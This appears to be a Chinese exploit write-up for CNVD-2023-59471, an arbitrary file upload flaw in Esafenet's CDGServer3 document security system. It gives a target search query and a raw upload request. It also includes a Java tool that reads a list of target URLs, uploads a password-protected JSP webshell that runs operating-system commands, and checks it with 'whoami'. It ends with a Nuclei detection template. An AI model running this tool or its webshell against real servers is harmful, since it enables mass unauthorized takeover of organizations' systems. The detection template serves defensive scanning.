CNVD-2023-59471：亿某通电子文档安全管理系统任意文件上传漏洞

<= V5.x
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 9.8

# 搜索语法app="亿赛通-电子文档安全管理系统"

POST /CDGServer3/UploadFileFromClientServiceForClient?AFMALANMJCEOENIBDJMKFHBANGEPKHNOFJBMIFJPFNKFOKHJNMLCOIDDJGNEIPOLOKGAFAFJHDEJPHEPLFJHDGPBNELNFIICGFNGEOEFBKCDDCGJEPIKFHJFAOOHJEPNNCLFHDAFDNCGBAEELJFFHABJPDPIEEMIBOECDMDLEPBJGBGCGLEMBDFAGOGM HTTP/1.1Host:ip User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeCookie: JSESSIONID=22C9717F219D60381079FEBCDC6F635AUpgrade-Insecure-Requests: 1Content-Length: 8
test

package org.example.POC;
import com.github.kevinsawicki.http.HttpRequest;
import java.io.BufferedReader;import java.io.FileReader;
public class CNVD_2023_59471 {    public static void main(String[] args) {        try (BufferedReader bufferedReader = new BufferedReader(new FileReader("D:\TempData\url.txt"))) {            String line;            while ((line = bufferedReader.readLine())  != null) {                checkVuln(line);            }        } catch (Exception e) {            System.out.println(e);        }
    }    public static void checkVuln(String URL){        String attackUrl = URL+"/CDGServer3/UploadFileFromClientServiceForClient?AFMALANMJCEOENIBDJMKFHBANGEPKHNOFJBMIFJPFNKFOKHJNMLCOIDDJGNEIPOLOKGAFAFJHDEJPHEPLFJHDGPBNELNFIICGFNGEOEFBKCDDCGJEPIKFHJFAOOHJEPNNCLFHDAFDNCGBAEELJFFHABJPDPIEEMIBOECDMDLEPBJGBGCGLEMBDFAGOGM";        String webShell_poc = "test";        String webShell_addr = URL+"/tttT.jsp";        String webShell_exp = "<% if("023".equals(request.getParameter("pwd"))){ java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream(); int a = -1; byte[] b = new byte[2048]; out.print("<pre>"); while((a=in.read(b))!=-1){ out.println(new String(b)); } out.print("</pre>"); } %>";        try {            int rs = HttpRequest.post(attackUrl).send(webShell_poc).connectTimeout(3000).code();            String content = HttpRequest.get(webShell_addr).connectTimeout(6000).body();            if(rs == 200){                if(content.equals("test")){                    System.out.println("[+]目标网站可能存在漏洞！！！");                    System.out.println("[+]正在进行getShell，请等待！！！");                    //Webshell上传                    int rs2 = HttpRequest.post(attackUrl).send(webShell_exp).connectTimeout(3000).code();                    if(rs2 == 200){                        //Webshell验证                        int command_rs = HttpRequest.get(webShell_addr+"?pwd=023&i=whoami").connectTimeout(3000).code();                        if(command_rs == 200 ){                            System.out.println("[+]Webshell上传成功，地址是"+webShell_addr+"?pwd=023&i=whoami");                        }else {                            System.out.println("[-]Webshell上传失败！！！可能存在AV被杀掉QWQ");                        }                    }else {                        System.out.println("[-]Webshell上传失败！请更换重新更换尝试上传.....");                    }
                }else {                    System.out.println("[-]Webshell上传失败，请尝试其他JSP木马尝试！！！");                }            }else {                System.out.println("[-]目标网站可能不存在漏洞！！！");            }        } catch (HttpRequest.HttpRequestException e) {            System.out.println("[-]存在网络连接问题-_-!");        }    }}

id: esafenet_CDGServer3-upload-CNVD-2023-59471 info:  name: 亿赛通电子文档安全管理系统任意文件上传漏洞  author: afei00123  severity: critical  description: |    亿赛通电子文档安全管理系统是一款电子文档安全防护软件，该系统利用驱动层透明加密技术，通过对电子文档的加密保护，防止内部员工泄密和外部人员非法窃取企业核心重要数据资产。亿赛通电子文档安全管理系统UploadFileFromClientServiceForClient接口处存在任意文件上传漏洞，未经授权的攻击者可通过此漏洞上传恶意后门文件，从而获取服务器权限。  reference:    - https://www.cnvd.org.cn/flaw/show/CNVD-2023-59471  metadata:    verified: "true"  classification:    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H    cvss-score: 9.8    cwe-id: CWE-77  tags: esafenet,upload,critical variables:  filename: "{{rand_base(6)}}"  context: "{{rand_base(6)}}" http:  - raw:      - |        POST /CDGServer3/UploadFileFromClientServiceForClient?AFMALANMJCEOENIBDJMKFHBANGEPKHNOFJBMIFJPFNKFOKHJNMLCOIDDJGNEIPOLOKGAFAFJHDEJPHEPLFJHDGPBNELNFIICGFNGEOEFBKCDDCGJEPIKFHJFAOOHJEPNNCLFHDAFDNCGBAEELJFFHABJPDPIEEMIBOECDMDLEPBJGBGCGLEMBDFAGOGM HTTP/1.1        Host: {{Hostname}}        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8        Accept-Encoding: gzip, deflate, br        Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2        Sec-Fetch-Dest: document        Sec-Fetch-Mode: navigate        Sec-Fetch-Site: none        Sec-Fetch-User: ?1        Upgrade-Insecure-Requests: 1        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0                {{context}}       - |        GET /tttT.jsp HTTP/1.1        Host: {{Hostname}}     matchers-condition: and    matchers:      - type: word        words:          - "{{context}}"        part: body_2        condition: and # Enhanced by mp on 2023/08/19